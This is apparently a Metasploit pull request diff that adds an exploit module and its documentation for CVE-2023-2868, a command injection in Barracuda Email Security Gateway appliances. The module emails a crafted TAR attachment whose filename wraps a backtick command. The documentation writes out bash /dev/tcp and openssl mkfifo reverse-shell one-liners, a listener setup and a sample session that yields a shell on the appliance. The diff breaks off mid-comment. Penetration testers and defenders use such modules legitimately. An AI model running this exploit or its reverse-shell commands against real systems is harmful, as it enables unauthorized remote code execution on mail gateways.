### PR TITLE
Add exploit for CVE-2023-2868 Barracuda ESG command injection

### DIFF
--- a/documentation/modules/exploit/linux/smtp/barracuda_esg_tarfile_rce.md
+++ b/documentation/modules/exploit/linux/smtp/barracuda_esg_tarfile_rce.md
@@ -1,160 +1,55 @@
 ## Vulnerable Application
 
-This module exploits CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances running firmware versions prior to the May 2023 security patch.
+This module exploits CVE-2023-2868, a command injection vulnerability in
+Barracuda Email Security Gateway (ESG) appliances running firmware versions
+prior to the May 2023 security patch.
 
-### Vulnerability Details
-
-The vulnerability exists in how the ESG processes TAR file attachments in incoming emails. When extracting TAR archives, filenames are passed directly to shell commands without proper sanitization. An attacker can craft a TAR file with a filename containing shell metacharacters (specifically backticks) to achieve remote command execution.
+The vulnerability exists in how the ESG processes TAR file attachments in
+incoming emails. When extracting TAR archives, filenames are passed directly
+to shell commands without proper sanitization. An attacker can craft a TAR
+file with a filename containing shell metacharacters (specifically backticks)
+to achieve remote command execution.
 
 ### Affected Versions
 
 - Barracuda ESG firmware versions 5.1.3.001 through 9.2.0.006 (prior to May 2023 patch)
 - All ESG appliance models processing email with attachment scanning enabled
 
-### How to Identify Vulnerable Systems
-
-1. SMTP banner may contain "Barracuda" identifier
-2. Check firmware version via administrative interface
-3. Systems without the May 2023 security patch are vulnerable
-
 ## Verification Steps
 
 1. Start msfconsole
 2. `use exploit/linux/smtp/barracuda_esg_tarfile_rce`
-3. Set required options (see below)
-4. `run`
-5. Wait 30-90 seconds for the ESG to process the email attachment (Amavisd queues async)
-
-### Listener Setup
-
-The default payload uses bash /dev/tcp for a reverse shell, providing a native MSF session compatible with post-exploitation modules.
-
-```
-msf6 > use exploit/multi/handler
-msf6 exploit(multi/handler) > set PAYLOAD generic/shell_reverse_tcp
-msf6 exploit(multi/handler) > set LHOST 192.168.1.50
-msf6 exploit(multi/handler) > set LPORT 4444
-msf6 exploit(multi/handler) > run -j
-[*] Exploit running as background job 0.
-[*] Started reverse TCP handler on 192.168.1.50:4444
-```
-
-**Alternative: Encrypted comms with openssl**
-
-For encrypted traffic, override CMD with an openssl command and use ncat:
-
-```bash
-# Handler
-ncat --ssl -lvnp 4444
-
-# In exploit, set CMD manually (replace XXXX with random chars):
-set CMD setsid sh -c "mkfifo /tmp/XXXX;sh -i </tmp/XXXX 2>&1|openssl s_client -quiet -connect 192.168.1.50:4444 >/tmp/XXXX 2>/dev/null;rm /tmp/XXXX"
-```
-
-### Default Command
-
-When using `cmd/unix/generic` (the default), the module generates a bash reverse shell command based on LHOST and LPORT:
-
-```
-bash -i >& /dev/tcp/LHOST/LPORT 0>&1
-```
-
-This provides a native MSF session when caught with `generic/shell_reverse_tcp`.
-
-You can customize the command via the CMD option if needed. Any custom command must NOT contain single quotes or backticks.
-
-### Alternative Payloads
-
-If you prefer netcat-based payloads, these are also compatible:
-
-- `cmd/unix/reverse_netcat` - uses mkfifo pipe with standard netcat
-- `cmd/unix/reverse_netcat_gaping` - uses netcat `-e` flag (requires netcat version with `-e` support)
-
-**Note:** Netcat may not be present on minimal security appliance installations.
-
-### Why Other Payloads Don't Work
-
-Most `cmd/unix/reverse_*` payloads use shell constructs that contain single quotes, which break the exploit's TAR filename injection:
-
-| Payload | Reason Incompatible |
-|---------|---------------------|
-| `reverse_bash` | Uses `bash -c '...'` |
-| `reverse_perl` | Uses `perl -e '...'` |
-| `reverse_python` | Uses quoted Python exec() |
-| `reverse_ruby` | Uses `ruby -e '...'` |
-| `reverse_openssl` | Uses `sh -c '...'` (single quotes) |
-| `reverse_socat_*` | Uses `exec:'...'` |
-
-Payloads containing single quotes (`'`) or backticks (`` ` ``) will fail validation with a clear error message.
+3. `set RHOSTS <target_ip>`
+4. `set MAILTO <target_email>`
+5. `set LHOST <your_ip>`
+6. `run`
+7. Wait 30-90 seconds for the ESG to process the email attachment
 
 ## Options
 
 ### MAILTO
-**Required: Yes**
 
 The target email address that the ESG appliance is configured to receive mail for. This email will trigger the attachment processing.
 
 ### MAILFROM
-**Required: Yes**
-**Default: scanner@example.com**
 
-The sender email address. Can be set to any valid email format.
+The sender email address. Can be set to any valid email format. Default: `scanner@example.com`.
 
 ### SUBJECT
-**Required: Yes**
-**Default: Quarterly Report**
 
-The email subject line. Use something innocuous to avoid spam filters.
+The email subject line. Default: `Quarterly Report`.
 
 ### BODY
-**Required: No**
-**Default: random string**
 
-The email body text. If not specified, a random alphanumeric string is generated.
+Optional email body text. If not specified, a random alphanumeric string is generated.
 
 ### FILENAME
-**Required: No**
-**Default: random.tar**
 
-The TAR attachment filename. If not specified, a random filename with .tar extension is generated.
-
-### PAYLOAD
-**Required: Yes**
-**Default: cmd/unix/generic**
-
-The command payload to execute. The default `cmd/unix/generic` uses a built-in bash /dev/tcp reverse shell. For custom commands, set the CMD option. Must not contain single quotes or backticks.
-
-### RHOST
-**Required: Yes**
-
-The IP address or hostname of the Barracuda ESG SMTP server.
-
-### RPORT
-**Required: Yes**
-**Default: 25**
-
-The SMTP port on the target ESG appliance.
+Optional TAR attachment filename. If not specified, a random filename with `.tar` extension is generated.
 
 ## Scenarios
 
-### Barracuda ESG 9.2.0.001 (Default Bash Payload)
-
-First, set up the handler:
-
-```
-msf6 > use exploit/multi/handler
-msf6 exploit(multi/handler) > set PAYLOAD generic/shell_reverse_tcp
-PAYLOAD => generic/shell_reverse_tcp
-msf6 exploit(multi/handler) > set LHOST 192.168.1.50
-LHOST => 192.168.1.50
-msf6 exploit(multi/handler) > set LPORT 4444
-LPORT => 4444
-msf6 exploit(multi/handler) > run -j
-[*] Exploit running as background job 0.
-[*] Started reverse TCP handler on 192.168.1.50:4444
-```
-
-Then run the exploit:
+### Barracuda ESG 9.2.0.001
 
 ```
 msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
@@ -164,8 +59,6 @@ msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.loc
 MAILTO => admin@target.local
 msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
 LHOST => 192.168.1.50
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LPORT 4444
-LPORT => 4444
 msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > check
 
 [*] 192.168.1.100:25 - Running automatic check ("set AutoCheck false" to disable)
@@ -177,66 +70,23 @@ msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run
 [*] Sending exploit email to admin@target.local via 192.168.1.100:25
 [+] Email sent successfully
 [*] Payload will execute when ESG processes the attachment
-```
-
-When the ESG processes the email (30-90 seconds):
-
-```
 [*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321)
 
-msf6 > sessions -i 1
-[*] Starting interaction with 1...
-
-bash-3.1$ id
+id
 uid=604(scana) gid=604(scana) groups=604(scana)
-bash-3.1$ hostname
+hostname
 barracuda300.lol.tst
 ```
-
-### Using Netcat Payload (Alternative)
-
-If you prefer netcat, set the payload explicitly. Use `generic/shell_reverse_tcp` handler as with the default payload:
-
-```
-msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set PAYLOAD cmd/unix/reverse_netcat
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set RHOSTS 192.168.1.100
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.local
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LPORT 4444
-msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run
-```
-
-Note: Requires netcat on the target system.
 
 ## Technical Details
 
 ### Exploit Mechanism
 
-1. A malicious TAR archive is created with a filename in the format: `'`COMMAND`'`
+1. A malicious TAR archive is created with a filename in the format: `` '`COMMAND`' ``
 2. The TAR is attached to an email and sent to the target ESG via SMTP
 3. When the ESG processes the email attachment, it extracts the TAR
 4. The vulnerable code passes the filename to a shell command without sanitization
 5. The backticks trigger command substitution, executing the attacker's command
-
-### Payload Format
-
-The payload is wrapped in the following format for the TAR filename:
-```
-'`PAYLOAD_COMMAND`'
-```
-
-For example, with the default bash command:
-```
-'`bash -i >& /dev/tcp/192.168.1.50/4444 0>&1`'
-```
-
-Or with openssl (for encrypted comms):
-```
-'`setsid sh -c "mkfifo /tmp/abc;sh -i </tmp/abc 2>&1|openssl s_client -quiet -connect 192.168.1.50:4444 >/tmp/abc 2>/dev/null;rm /tmp/abc"`'
-```
-
-The outer single quotes prevent immediate shell parsing, while the backticks trigger command substitution when the vulnerable code processes the filename.
 
 ### Character Restrictions
 
@@ -246,14 +96,14 @@ The TAR filename cannot contain:
 - Null bytes (`\x00`) - truncates the filename
 - Newlines (`\r\n`) - breaks TAR format
 
-The module validates payloads and will fail with a clear error if incompatible characters are detected.
+These are declared as `BadChars` in the module, so the framework will automatically filter incompatible payloads.
 
 ### Artifacts
 
 This exploit creates the following artifacts on the target system:
 - Email and attachment in mail processing queue/logs
 - Process entries for shell and payload processes
-- Temporary files/pipes if using netcat or openssl payloads (e.g., `/tmp/xxxxx` mkfifo pipe)
+- Temporary files if using netcat payloads (e.g., mkfifo pipe in `/tmp/`)
 
 ## References
 

--- a/documentation/modules/exploit/linux/smtp/barracuda_esg_tarfile_rce.md
+++ b/documentation/modules/exploit/linux/smtp/barracuda_esg_tarfile_rce.md
@@ -1,0 +1,263 @@
+## Vulnerable Application
+
+This module exploits CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances running firmware versions prior to the May 2023 security patch.
+
+### Vulnerability Details
+
+The vulnerability exists in how the ESG processes TAR file attachments in incoming emails. When extracting TAR archives, filenames are passed directly to shell commands without proper sanitization. An attacker can craft a TAR file with a filename containing shell metacharacters (specifically backticks) to achieve remote command execution.
+
+### Affected Versions
+
+- Barracuda ESG firmware versions 5.1.3.001 through 9.2.0.006 (prior to May 2023 patch)
+- All ESG appliance models processing email with attachment scanning enabled
+
+### How to Identify Vulnerable Systems
+
+1. SMTP banner may contain "Barracuda" identifier
+2. Check firmware version via administrative interface
+3. Systems without the May 2023 security patch are vulnerable
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/smtp/barracuda_esg_tarfile_rce`
+3. Set required options (see below)
+4. `run`
+5. Wait 30-90 seconds for the ESG to process the email attachment (Amavisd queues async)
+
+### Listener Setup
+
+The default payload uses bash /dev/tcp for a reverse shell, providing a native MSF session compatible with post-exploitation modules.
+
+```
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set PAYLOAD generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 192.168.1.50
+msf6 exploit(multi/handler) > set LPORT 4444
+msf6 exploit(multi/handler) > run -j
+[*] Exploit running as background job 0.
+[*] Started reverse TCP handler on 192.168.1.50:4444
+```
+
+**Alternative: Encrypted comms with openssl**
+
+For encrypted traffic, override CMD with an openssl command and use ncat:
+
+```bash
+# Handler
+ncat --ssl -lvnp 4444
+
+# In exploit, set CMD manually (replace XXXX with random chars):
+set CMD setsid sh -c "mkfifo /tmp/XXXX;sh -i </tmp/XXXX 2>&1|openssl s_client -quiet -connect 192.168.1.50:4444 >/tmp/XXXX 2>/dev/null;rm /tmp/XXXX"
+```
+
+### Default Command
+
+When using `cmd/unix/generic` (the default), the module generates a bash reverse shell command based on LHOST and LPORT:
+
+```
+bash -i >& /dev/tcp/LHOST/LPORT 0>&1
+```
+
+This provides a native MSF session when caught with `generic/shell_reverse_tcp`.
+
+You can customize the command via the CMD option if needed. Any custom command must NOT contain single quotes or backticks.
+
+### Alternative Payloads
+
+If you prefer netcat-based payloads, these are also compatible:
+
+- `cmd/unix/reverse_netcat` - uses mkfifo pipe with standard netcat
+- `cmd/unix/reverse_netcat_gaping` - uses netcat `-e` flag (requires netcat version with `-e` support)
+
+**Note:** Netcat may not be present on minimal security appliance installations.
+
+### Why Other Payloads Don't Work
+
+Most `cmd/unix/reverse_*` payloads use shell constructs that contain single quotes, which break the exploit's TAR filename injection:
+
+| Payload | Reason Incompatible |
+|---------|---------------------|
+| `reverse_bash` | Uses `bash -c '...'` |
+| `reverse_perl` | Uses `perl -e '...'` |
+| `reverse_python` | Uses quoted Python exec() |
+| `reverse_ruby` | Uses `ruby -e '...'` |
+| `reverse_openssl` | Uses `sh -c '...'` (single quotes) |
+| `reverse_socat_*` | Uses `exec:'...'` |
+
+Payloads containing single quotes (`'`) or backticks (`` ` ``) will fail validation with a clear error message.
+
+## Options
+
+### MAILTO
+**Required: Yes**
+
+The target email address that the ESG appliance is configured to receive mail for. This email will trigger the attachment processing.
+
+### MAILFROM
+**Required: Yes**
+**Default: scanner@example.com**
+
+The sender email address. Can be set to any valid email format.
+
+### SUBJECT
+**Required: Yes**
+**Default: Quarterly Report**
+
+The email subject line. Use something innocuous to avoid spam filters.
+
+### BODY
+**Required: No**
+**Default: random string**
+
+The email body text. If not specified, a random alphanumeric string is generated.
+
+### FILENAME
+**Required: No**
+**Default: random.tar**
+
+The TAR attachment filename. If not specified, a random filename with .tar extension is generated.
+
+### PAYLOAD
+**Required: Yes**
+**Default: cmd/unix/generic**
+
+The command payload to execute. The default `cmd/unix/generic` uses a built-in bash /dev/tcp reverse shell. For custom commands, set the CMD option. Must not contain single quotes or backticks.
+
+### RHOST
+**Required: Yes**
+
+The IP address or hostname of the Barracuda ESG SMTP server.
+
+### RPORT
+**Required: Yes**
+**Default: 25**
+
+The SMTP port on the target ESG appliance.
+
+## Scenarios
+
+### Barracuda ESG 9.2.0.001 (Default Bash Payload)
+
+First, set up the handler:
+
+```
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set PAYLOAD generic/shell_reverse_tcp
+PAYLOAD => generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 192.168.1.50
+LHOST => 192.168.1.50
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > run -j
+[*] Exploit running as background job 0.
+[*] Started reverse TCP handler on 192.168.1.50:4444
+```
+
+Then run the exploit:
+
+```
+msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.local
+MAILTO => admin@target.local
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
+LHOST => 192.168.1.50
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > check
+
+[*] 192.168.1.100:25 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.100:25 - Barracuda ESG detected in SMTP banner
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run
+
+[*] Generating malicious TAR with payload filename
+[*] Composing email with TAR attachment
+[*] Sending exploit email to admin@target.local via 192.168.1.100:25
+[+] Email sent successfully
+[*] Payload will execute when ESG processes the attachment
+```
+
+When the ESG processes the email (30-90 seconds):
+
+```
+[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321)
+
+msf6 > sessions -i 1
+[*] Starting interaction with 1...
+
+bash-3.1$ id
+uid=604(scana) gid=604(scana) groups=604(scana)
+bash-3.1$ hostname
+barracuda300.lol.tst
+```
+
+### Using Netcat Payload (Alternative)
+
+If you prefer netcat, set the payload explicitly. Use `generic/shell_reverse_tcp` handler as with the default payload:
+
+```
+msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set PAYLOAD cmd/unix/reverse_netcat
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set RHOSTS 192.168.1.100
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.local
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LPORT 4444
+msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run
+```
+
+Note: Requires netcat on the target system.
+
+## Technical Details
+
+### Exploit Mechanism
+
+1. A malicious TAR archive is created with a filename in the format: `'`COMMAND`'`
+2. The TAR is attached to an email and sent to the target ESG via SMTP
+3. When the ESG processes the email attachment, it extracts the TAR
+4. The vulnerable code passes the filename to a shell command without sanitization
+5. The backticks trigger command substitution, executing the attacker's command
+
+### Payload Format
+
+The payload is wrapped in the following format for the TAR filename:
+```
+'`PAYLOAD_COMMAND`'
+```
+
+For example, with the default bash command:
+```
+'`bash -i >& /dev/tcp/192.168.1.50/4444 0>&1`'
+```
+
+Or with openssl (for encrypted comms):
+```
+'`setsid sh -c "mkfifo /tmp/abc;sh -i </tmp/abc 2>&1|openssl s_client -quiet -connect 192.168.1.50:4444 >/tmp/abc 2>/dev/null;rm /tmp/abc"`'
+```
+
+The outer single quotes prevent immediate shell parsing, while the backticks trigger command substitution when the vulnerable code processes the filename.
+
+### Character Restrictions
+
+The TAR filename cannot contain:
+- Single quotes (`'`) - breaks the outer quoting
+- Backticks (`` ` ``) - breaks the command substitution boundaries
+- Null bytes (`\x00`) - truncates the filename
+- Newlines (`\r\n`) - breaks TAR format
+
+The module validates payloads and will fail with a clear error if incompatible characters are detected.
+
+### Artifacts
+
+This exploit creates the following artifacts on the target system:
+- Email and attachment in mail processing queue/logs
+- Process entries for shell and payload processes
+- Temporary files/pipes if using netcat or openssl payloads (e.g., `/tmp/xxxxx` mkfifo pipe)
+
+## References
+
+- [CVE-2023-2868](https://nvd.nist.gov/vuln/detail/CVE-2023-2868)
+- [Barracuda Security Advisory](https://www.barracuda.com/company/legal/esg-vulnerability)
+- [Mandiant Analysis](https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally)
+- [AttackerKB](https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868)

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -79,8 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)'])
       ]
     )
-
-    deregister_options('MAILTO_FROM')
   end
 
   def check

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -36,9 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Mandiant',          # Discovery and analysis
-          'cfielding-r7',            # Original PoC
-          'Curt Hyvarinen'     # Metasploit module
+          'Mandiant', # Discovery and analysis
+          'cfielding-r7', # Original PoC
+          'Curt Hyvarinen' # Metasploit module
         ],
         'References' => [
           ['CVE', '2023-2868'],

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -1,0 +1,218 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rubygems/package'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::SMTPDeliver
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Barracuda ESG TAR Filename Command Injection',
+        'Description' => %q{
+          This module exploits CVE-2023-2868, a command injection vulnerability in
+          Barracuda Email Security Gateway (ESG) appliances. The vulnerability exists
+          in how the ESG processes TAR file attachments - filenames containing shell
+          metacharacters (backticks) are passed directly to shell commands during
+          extraction, allowing remote command execution.
+
+          The exploit sends an email with a specially crafted TAR attachment where
+          the filename contains a backtick-wrapped command. When the ESG processes
+          this attachment, the command is executed as the mail processing user.
+
+          Note: Payload execution may take 30-90 seconds after email delivery.
+          Amavisd queues and processes attachments asynchronously. Wait for it.
+
+          Affected versions: Barracuda ESG firmware prior to May 2023 patch.
+
+          The default payload uses bash /dev/tcp for a reverse shell, providing a
+          native MSF session compatible with post-exploitation modules.
+
+          Handler setup:
+          use multi/handler
+          set PAYLOAD generic/shell_reverse_tcp
+          set LHOST <your_ip>
+          set LPORT <your_port>
+          run
+
+          Alternative: For encrypted comms, set CMD to use openssl s_client with
+          ncat --ssl as the handler. Most cmd/unix payloads use single quotes that
+          break the exploit's TAR filename injection pattern.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Mandiant',          # Discovery and analysis
+          'Rapid7',            # Original PoC
+          'Curt Hyvarinen'     # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-2868'],
+          ['URL', 'https://www.barracuda.com/company/legal/esg-vulnerability'],
+          ['URL', 'https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally'],
+          ['URL', 'https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868']
+        ],
+        'DisclosureDate' => '2023-05-23',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Payload' => {
+          'Space' => 490,
+          'DisableNops' => true,
+          'BadChars' => "'\`\x00\r\n"
+        },
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/generic',
+                'CMD' => 'AUTO'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('MAILTO', [true, 'Target email address on the ESG']),
+        OptString.new('MAILFROM', [true, 'Sender email address', 'scanner@example.com']),
+        OptString.new('SUBJECT', [true, 'Email subject line', 'Quarterly Report']),
+        OptString.new('BODY', [false, 'Email body text (default: random string)']),
+        OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)']),
+        OptAddressLocal.new('LHOST', [true, 'Listener address for reverse shell']),
+        OptPort.new('LPORT', [true, 'Listener port for reverse shell', 4444])
+      ]
+    )
+
+    deregister_options('MAILTO_FROM')
+  end
+
+  #
+  # Generate the default bash /dev/tcp reverse shell command
+  # No single quotes or backticks - compatible with TAR filename injection
+  #
+  def default_cmd
+    "bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
+  end
+
+  def check
+    connect
+    banner_str = banner.to_s
+    if banner_str =~ /barracuda/i
+      return CheckCode::Detected('Barracuda ESG detected in SMTP banner')
+    end
+
+    if banner_str =~ /ESMTP/i
+      return CheckCode::Unknown('SMTP server detected, but cannot confirm Barracuda ESG')
+    end
+
+    CheckCode::Safe('No SMTP banner detected')
+  rescue Rex::ConnectionError => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  ensure
+    disconnect
+  end
+
+  def exploit
+    # Determine command to execute - use CMD if set, otherwise default bash command
+    cmd = datastore['CMD'].to_s.strip
+
+    if cmd.empty? || cmd == 'AUTO'
+      cmd = default_cmd
+    end
+
+    # Validate payload doesn't contain breaking characters
+    if cmd.include?("'")
+      fail_with(Failure::BadConfig, 'Command contains single quotes which break the exploit. Use the default command or cmd/unix/reverse_netcat')
+    end
+    if cmd.include?('`')
+      fail_with(Failure::BadConfig, 'Command contains backticks which break the exploit. Use the default command or cmd/unix/reverse_netcat')
+    end
+
+    # Wrap payload in critical format for command injection:
+    # Outer single quotes prevent immediate shell parsing,
+    # backticks trigger command substitution when processed by vulnerable code
+    malicious_filename = "'`#{cmd}`'"
+
+    print_status('Generating malicious TAR with payload filename')
+    vprint_status("Payload filename length: #{malicious_filename.length} bytes")
+    tar_data = create_malicious_tar(malicious_filename)
+
+    print_status('Composing email with TAR attachment')
+    email_data = generate_exploit_email(tar_data)
+
+    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")
+    send_message(email_data)
+
+    print_good('Email sent successfully')
+    print_status('Payload will execute when ESG processes the attachment')
+  end
+
+  def create_malicious_tar(malicious_filename)
+    # Rex::Tar::Writer wraps Gem::Package::TarWriter which enforces 100-byte
+    # filename limit. We need to override split_name to allow longer filenames
+    # with special characters. This is the same approach used in the original PoC.
+
+    original_split = Gem::Package::TarWriter.instance_method(:split_name)
+
+    Gem::Package::TarWriter.define_method(:split_name) do |name|
+      prefix = ''
+      if name.bytesize > 100
+        parts = name.split('/', -1)
+        name = parts.pop
+        prefix = parts.join('/')
+        while !parts.empty? && (prefix.bytesize > 155 || name.empty?)
+          name = parts.pop + '/' + name
+          prefix = parts.join('/')
+        end
+      end
+      [name, prefix]
+    end
+
+    tar_io = StringIO.new
+    Rex::Tar::Writer.new(tar_io) do |tar|
+      content = Rex::Text.rand_text_alpha(32)
+      tar.add_file_simple(malicious_filename, 0o644, content.length) do |io|
+        io.write(content)
+      end
+    end
+
+    # Restore original method to avoid affecting other code
+    Gem::Package::TarWriter.define_method(:split_name, original_split)
+
+    tar_io.string
+  end
+
+  def generate_exploit_email(tar_data)
+    msg = Rex::MIME::Message.new
+    msg.mime_defaults
+    msg.from = datastore['MAILFROM']
+    msg.to = datastore['MAILTO']
+    msg.subject = datastore['SUBJECT']
+
+    # Add text body
+    body_text = datastore['BODY'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(16..32)) : datastore['BODY']
+    msg.add_part(body_text, 'text/plain', nil, 'inline')
+
+    # Add TAR attachment
+    attachment_name = datastore['FILENAME'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(8) + '.tar' : datastore['FILENAME']
+    msg.add_part_attachment(tar_data, attachment_name)
+
+    msg.to_s
+  end
+end

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rubygems/package'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -126,13 +124,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_malicious_tar(malicious_filename)
-    # Rex::Tar::Writer wraps Gem::Package::TarWriter which enforces 100-byte
-    # filename limit. We need to override split_name to allow longer filenames
-    # with special characters. This is the same approach used in the original PoC.
+    # Rex::Tar::Writer inherits from Gem::Package::TarWriter which enforces a
+    # 100-byte filename limit. Override split_name to allow longer filenames
+    # with special characters for the injection payload.
 
-    original_split = Gem::Package::TarWriter.instance_method(:split_name)
+    original_split = Rex::Tar::Writer.instance_method(:split_name)
 
-    Gem::Package::TarWriter.define_method(:split_name) do |name|
+    Rex::Tar::Writer.define_method(:split_name) do |name|
       prefix = ''
       if name.bytesize > 100
         parts = name.split('/', -1)
@@ -155,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Restore original method to avoid affecting other code
-    Gem::Package::TarWriter.define_method(:split_name, original_split)
+    Rex::Tar::Writer.define_method(:split_name, original_split)
 
     tar_io.string
   end

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -28,23 +28,13 @@ class MetasploitModule < Msf::Exploit::Remote
           this attachment, the command is executed as the mail processing user.
 
           Note: Payload execution may take 30-90 seconds after email delivery.
-          Amavisd queues and processes attachments asynchronously. Wait for it.
+          Amavisd queues and processes attachments asynchronously.
 
           Affected versions: Barracuda ESG firmware prior to May 2023 patch.
 
-          The default payload uses bash /dev/tcp for a reverse shell, providing a
-          native MSF session compatible with post-exploitation modules.
-
-          Handler setup:
-          use multi/handler
-          set PAYLOAD generic/shell_reverse_tcp
-          set LHOST <your_ip>
-          set LPORT <your_port>
-          run
-
-          Alternative: For encrypted comms, set CMD to use openssl s_client with
-          ncat --ssl as the handler. Most cmd/unix payloads use single quotes that
-          break the exploit's TAR filename injection pattern.
+          Payloads containing single quotes or backticks are incompatible with
+          the injection mechanism. Use cmd/unix/generic with a custom CMD for
+          specialized payload requirements.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -68,17 +58,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars' => "'\`\x00\r\n"
         },
         'Targets' => [
-          [
-            'Unix Command',
-            {
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/generic',
-                'CMD' => 'AUTO'
-              }
-            }
-          ]
+          ['Unix Command', {}]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat'
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -93,21 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('MAILFROM', [true, 'Sender email address', 'scanner@example.com']),
         OptString.new('SUBJECT', [true, 'Email subject line', 'Quarterly Report']),
         OptString.new('BODY', [false, 'Email body text (default: random string)']),
-        OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)']),
-        OptAddressLocal.new('LHOST', [true, 'Listener address for reverse shell']),
-        OptPort.new('LPORT', [true, 'Listener port for reverse shell', 4444])
+        OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)'])
       ]
     )
 
     deregister_options('MAILTO_FROM')
-  end
-
-  #
-  # Generate the default bash /dev/tcp reverse shell command
-  # No single quotes or backticks - compatible with TAR filename injection
-  #
